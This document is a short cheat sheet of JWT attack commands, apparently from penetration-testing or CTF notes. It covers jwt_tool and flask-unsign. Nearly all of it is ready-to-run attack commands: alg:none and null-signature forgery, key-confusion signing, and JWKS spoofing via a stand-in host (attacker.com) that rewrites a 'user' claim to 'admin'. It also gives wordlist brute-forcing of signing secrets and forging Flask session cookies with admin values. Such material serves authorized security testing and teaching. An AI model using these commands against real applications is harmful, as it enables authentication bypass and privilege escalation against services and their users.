
JWT Attack Tools

📚 Resources

๐Ÿ› ๏ธ JWT_Tool โ€‹

bash
# interactive mode to edit values
jwt_tool $(cat jwt) -T

# change header value
jwt_tool $(cat jwt) -I -hc <key> -hv <new_value>

# change payload value
jwt_tool $(cat jwt) -I -pc <key> -pv <new_value>

# After saving the new JWT to a new file
jwt_tool $(cat new_jwt) -X k -pk /key/file # the -I option can also be used here

# Brute force the signing secret with a wordlist
jwt_tool $(cat jwt) -C -d /path/to/dictionary
bash
# The -X option selects which specific attack to run
a = alg:none
n = null signature
b = <blank> password accepted in signature
s = spoof JWKS (specify JWKS URL with -ju, or set in jwtconf.ini to automate this attack)
k = key confusion (specify public key with -pk) # uses the public key to sign the JWT
i = inject inline JWKS # Key Injection in header (CVE-2018-0114)
bash
# Invalid Signature

jwt_tool jwt -X k -pk /dev/null # sign with an empty key (/dev/null)
jwt_tool jwt -X n # remove the signature
jwt_tool jwt -X a # remove the signature and output 4 JWTs with alg set to none, None, NONE, nOnE

JWK - jku

bash
# Copy the key from the path below into a file of your own for storing the key
tail -n +3 ~/.jwt_tool/jwttool_custom_jwks.json | head -n -2 > jwk.json  # Extract the first key from jwttool_custom_jwks.json and save it as jwk.json to host on your server

# Sign the JWT using jwttool's default key file
jwt_tool $(cat jwt) -X s -ju http://attacker.com/jwks.json -I -pc user -pv admin
bash
# Or sign the JWT using your own custom key file
jwt_tool $(cat jwt) -X s -ju http://attacker.com/jwks.json -I -pc user -pv admin -jw my_custom_jwk.json
bash
# Or sign the JWT using the private_key.pem instead of the JWKS
jwt_tool $(cat jwt) -X s -ju http://attacker.com/jwks.json -I -pc user -pv admin -pr ctf_jwt/private_key.pem

Flask-unsign

bash
# install
pip install flask-unsign
bash
# Decode a JWT:
flask-unsign --decode --cookie "your_jwt_token"
# or
flask-unsign --decode --cookie < cookie.txt
bash
# Brute-force signature key
flask-unsign --wordlist /path/to/wordlist --unsign --cookie "your_jwt_token" --no-literal-eval
bash
# Create a Modified JWT with a Known Key:
flask-unsign --sign --cookie "{'admin': 'true','username': 'admin'}" --secret 'your_secret_key'